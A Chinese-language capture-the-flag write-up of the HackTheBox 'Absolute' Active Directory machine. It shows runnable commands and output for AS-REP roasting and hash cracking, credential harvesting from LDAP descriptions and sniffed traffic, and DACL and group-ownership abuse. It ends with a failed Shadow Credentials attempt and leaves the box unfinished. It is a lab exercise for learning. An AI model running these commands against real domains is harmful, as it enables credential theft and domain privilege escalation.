HTB-Absolute

靶机ip：10.10.11.181

知识点

信息收集

rustscan -a 10.10.11.181 -u 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.181:53
Open 10.10.11.181:80
Open 10.10.11.181:88
Open 10.10.11.181:135
Open 10.10.11.181:139
Open 10.10.11.181:389
Open 10.10.11.181:445
Open 10.10.11.181:464
Open 10.10.11.181:593
Open 10.10.11.181:636
Open 10.10.11.181:3268
Open 10.10.11.181:3269
Open 10.10.11.181:9389
Open 10.10.11.181:5985
Open 10.10.11.181:47001
Open 10.10.11.181:49664
Open 10.10.11.181:49665
Open 10.10.11.181:49666
Open 10.10.11.181:49667
Open 10.10.11.181:49674
Open 10.10.11.181:49671
Open 10.10.11.181:49675
Open 10.10.11.181:49679
Open 10.10.11.181:49685
Open 10.10.11.181:49703
Open 10.10.11.181:49722

SMB服务

smbclient -L //10.10.11.181
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smb没什么有用的信息

HTTP服务

静态页面，目录扫描也没拥有的结果，将网站轮播的六张图片下载下来查看一下

for i in {1..6};do wget http://10.10.11.181/images/hero_$i.jpg;done

使用exiftool工具查看一下

exiftool hero_1.jpg
ExifTool Version Number         : 12.76
File Name                       : hero_1.jpg
Directory                       : .
File Size                       : 407 kB
File Modification Date/Time     : 2022:06:08 03:45:20+08:00
File Access Date/Time           : 2025:03:25 03:04:05+08:00
File Inode Change Date/Time     : 2025:03:25 03:03:26+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Little-endian (Intel, II)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Artist                          : James Roberts
Y Cb Cr Positioning             : Centered
Quality                         : 60%
XMP Toolkit                     : Image::ExifTool 11.88
Author                          : James Roberts
Creator Tool                    : Adobe Photoshop CC 2018 Macintosh
Derived From Document ID        : 6413FD608B5C21D0939F910C0EFBBE44
Derived From Instance ID        : 6413FD608B5C21D0939F910C0EFBBE44
Document ID                     : xmp.did:887A47FA048811EA8574B646AF4FC464
Instance ID                     : xmp.iid:887A47F9048811EA8574B646AF4FC464
DCT Encode Version              : 100
APP14 Flags 0                   : [14], Encoded with Blend=1 downsampling
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 1900
Image Height                    : 1150
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1900x1150
Megapixels                      : 2.2

注意到Author字段有用户名，将每个文件的用户名都保存到name.txt文件中

正常Author和Artist是都有用户名的，这里查看第二个图片的时候发现没有Artist字段，所以改用Author

exiftool *.jpg | grep Author | awk -F' ' '{print $3" "$4}' > name.txt
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith

使用username-anarchy工具生成用户名字典

./username-anarchy -i name.txt > users.txt

AS-REP Roasting攻击

impacket-GetNPUsers -usersfile users.txt -dc-ip 10.10.11.181 -format john absolute.htb/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

...[snip]...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$d.klay@ABSOLUTE.HTB:18530e0c59304e8b5d667ac0cf0efa8a$ed41890599de622a5cf7808aef24c8272c03a5fb62a14b9de3f987e2f9ecc614fe22d44e7eba318ab44152271b84577844980b33e7b78ed0f9b36ebe43b4a6cc5339ecbef110e6325a4acb9d7661b4db47a609eccf7b13c53f9d1aa710a0220102bed90c8b8ee8c8319b9297d811d6c878cd9fca0e24646d82ac6c9d77b9aaf2b40ed8b9ef0c103166c3be1113daa285fca49a2dcba3dbae9d92cafeb6b7774bbd58982eaec5d712f744a281f2317b491555fcc7d58a8ed4c89d435a488b8e7df5c07d181007c5aeb3bd9c3dbb44bf896e9cdfc57509eeea3e7f76ff3d87a87cd7825e1f82e6f8724f9ba348
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...[snip]...

找到一个hash，将其保存至hash文件中，使用john爆破

john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Darkmoonsky248girl ($krb5asrep$d.klay@ABSOLUTE.HTB)
1g 0:00:00:32 DONE (2025-03-25 03:27) 0.03097g/s 348137p/s 348137c/s 348137C/s DarrenCahppell..DarkAngelNinjaHaku
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功得到一组用户名密码

username: d.klay
password: Darkmoonsky248girl

再探SMB

使用netexec枚举

netexec winrm 10.10.11.181 -u d.klay -p Darkmoonsky248girl
WINRM       10.10.11.181    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:absolute.htb)
WINRM       10.10.11.181    5985   DC               [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION

虽然都失败了，但是注意到smb登录的时候爆出个STATUS_ACCOUNT_RESTRICTION错误，表明该账户受到限制，尝试加上-k参数使用Kerberos认证

netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl

将上面失败的命令重新试一下

netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl

OK，成功

查看一下smb共享

netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k --shares
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl
SMB         10.10.11.181    445    DC               [*] Enumerated shares
SMB         10.10.11.181    445    DC               Share           Permissions     Remark
SMB         10.10.11.181    445    DC               -----           -----------     ------
SMB         10.10.11.181    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.181    445    DC               C$                              Default share
SMB         10.10.11.181    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.181    445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.181    445    DC               Shared
SMB         10.10.11.181    445    DC               SYSVOL          READ            Logon server share

注意到有个Shared文件可以访问，但是需要Kerberos认证，只能寻找其他方法了

TGT黄金票据伪造

由于smb服务需要Kerberos认证，所以我们尝试一下伪造票据来访问smb

impacket-getTGT 'absolute.htb'/'d.klay':'Darkmoonsky248girl' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in d.klay.ccache

导入票据

export KRB5CCNAME=d.klay.ccache

先同步下时间

ntpdate -s absolute.htb

访问smb

impacket-smbclient 'absolute.htb/d.klay:Darkmoonsky248girl@dc.absolute.htb' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
#

可以访问smb，但是没有权限查看，尝试通过ldap枚举用户

netexec ldap 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k --users
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP        10.10.11.181    389    DC               [*] Enumerated 17 domain users: absolute.htb
LDAP        10.10.11.181    389    DC               -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.10.11.181    389    DC               Administrator                 2022-06-09 08:25:57 0       Built-in account for administering the computer/domain
LDAP        10.10.11.181    389    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
LDAP        10.10.11.181    389    DC               krbtgt                        2022-06-09 08:16:38 0       Key Distribution Center Service Account
LDAP        10.10.11.181    389    DC               J.Roberts                     2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               M.Chaffrey                    2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               D.Klay                        2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               s.osvald                      2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               j.robinson                    2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               n.smith                       2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               m.lovegod                     2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               l.moore                       2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               c.colt                        2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               s.johnson                     2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               d.lemm                        2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               svc_smb                       2022-06-09 08:25:51 0       AbsoluteSMBService123!
LDAP        10.10.11.181    389    DC               svc_audit                     2022-06-09 08:25:51 0
LDAP        10.10.11.181    389    DC               winrm_user                    2022-06-09 08:25:51 2       Used to perform simple network tasks

找到一组用户名密码

username: svc_smb
password: AbsoluteSMBService123!

使用nxc验证一下

nxc smb 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!'
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [-] absolute.htb\svc_smb:AbsoluteSMBService123! STATUS_ACCOUNT_RESTRICTION

正常还是访问不了的，继续伪造金票

impacket-getTGT 'absolute.htb'/'svc_smb':'AbsoluteSMBService123!' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_smb.ccache

导入票据

export KRB5CCNAME=svc_smb.ccache

访问smb

impacket-smbclient 'absolute.htb'/'svc_smb':'AbsoluteSMBService123!'@'dc.absolute.htb' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
#

访问成功，直接看之前找到的Shared目录

# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use shared
# ls
drw-rw-rw-          0  Fri Sep  2 01:02:23 2022 .
drw-rw-rw-          0  Fri Sep  2 01:02:23 2022 ..
-rw-rw-rw-         72  Fri Sep  2 01:02:23 2022 compiler.sh
-rw-rw-rw-      67584  Fri Sep  2 01:02:23 2022 test.exe
# get compiler.sh
# get test.exe
#

发现两个文件，下载到本地查看一下

看不懂的exe

cat compiler.sh
#!/bin/bash

nim c -d:mingw --app:gui --cc:gcc -d:danger -d:strip $1

.sh文件没啥有用信息，就编译了一下，重点看下exe文件

根据这个反汇编程序+GPT得知可能是运行某种服务的程序，尝试在windows上运行并用wireshark抓包

注：一定要配置DNS，不然抓不到包

使用wireshark监听该网卡，运行程序即可

这就是抓到的全部报文，注意到这其中有一条保温报文显示absolute.htb\mlovegod，追踪一下tcp

发现一组新的用户名密码，结合之前使用 ldap 枚举出的用户名，可以得到该用户名和密码

username: m.lovegod
password: AbsoluteLDAP2022!

验证一下

依旧是熟悉的伪造金票

impacket-getTGT 'absolute.htb'/'m.lovegod':'AbsoluteLDAP2022!' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in m.lovegod.ccache

导入票据（记得同步时间）

export KRB5CCNAME=m.lovegod.ccache

nxc验证

nxc smb 10.10.11.181 -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!

nxc ldap 10.10.11.181 -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!

依旧登陆不了，使用bloodhound信息收集吧

bloodhound信息收集

bloodhound-python -ns 10.10.11.181 --dns-tcp -d absolute.htb -u m.lovegod -p AbsoluteLDAP2022! -k -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: absolute.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.absolute.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250326005117_bloodhound.zip

打开bloodhound查看

以m.lovegod用户为起点，点击Transitive Object Control可以得到如下信息

m.lovegod 用户拥有 Network Audit 组，但不是其成员，该组对 winrm_user 用户上有 GenericWrite权限，并且winrm_user 用户属于REMOTE MANAGEMENT USERS组，所以我们可以通过winrm_user 用户远程登陆

但是我们发现m.lovegod 用户属于图中的三个组并不属于Network Audit组

所以我们的攻击手法就是先将m.lovegod 用户添加到Network Audit组，再通过Network Audit组对 winrm_user 用户有 GenericWrite权限，可以直接进行Shadow Credentials攻击

拿下winrm_user？

参考链接：

https://www.thehacker.recipes/ad/movement/dacl/grant-ownership

https://www.thehacker.recipes/ad/movement/dacl/grant-rights

先同步时间

ntpdate -s absolute.htb

将 m.lovegod 用户修改成 Network Audit 组的所有者

impacket-owneredit -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -new-owner m.lovegod -target 'Network Audit' -action write
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-4078382237-1492182817-2568127209-1109
[*] - sAMAccountName: m.lovegod
[*] - distinguishedName: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
[*] OwnerSid modified successfully!

使m.lovegod用户完全控制 Network Audit 组

impacket-dacledit -k 'absolute.htb/m.lovegod:AbsoluteLDAP2022!' -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250326-034031.bak
[*] DACL modified successfully!

把m.lovegod自己加入到 Network Audit 组里面

bloodyAD --host dc.absolute.htb --dc-ip 10.10.11.181 -d 'absolute.htb' -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k add groupMember "Network Audit" "m.lovegod"
[+] m.lovegod added to Network Audit

加入成功，重新生成一下金票

impacket-getTGT 'absolute.htb'/'m.lovegod':'AbsoluteLDAP2022!' -dc-ip 10.10.11.181

export KRB5CCNAME=m.lovegod.ccache

对用户 winrm_user 执行 Shadow Credentials 攻击

certipy-ad shadow auto -k -username m.lovegod@absolute.htb -p 'AbsoluteLDAP2022!' -account winrm_user -target dc.absolute.htb -dc-ip 10.10.11.181
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '22e415af-e00b-59e5-9462-693c3948067e'
[*] Adding Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': None

不出意外的话还是出意外了，请求TGT的时候出问题了

还是看下报错吧，熟悉的KDC_ERR_PADATA_TYPE_NOSUPP错误，猜测是因为机器的PKINIT过期了，所以 Shadow Credentials 攻击是不行的

待更新

试了挺多办法都失败了，先到这吧。。。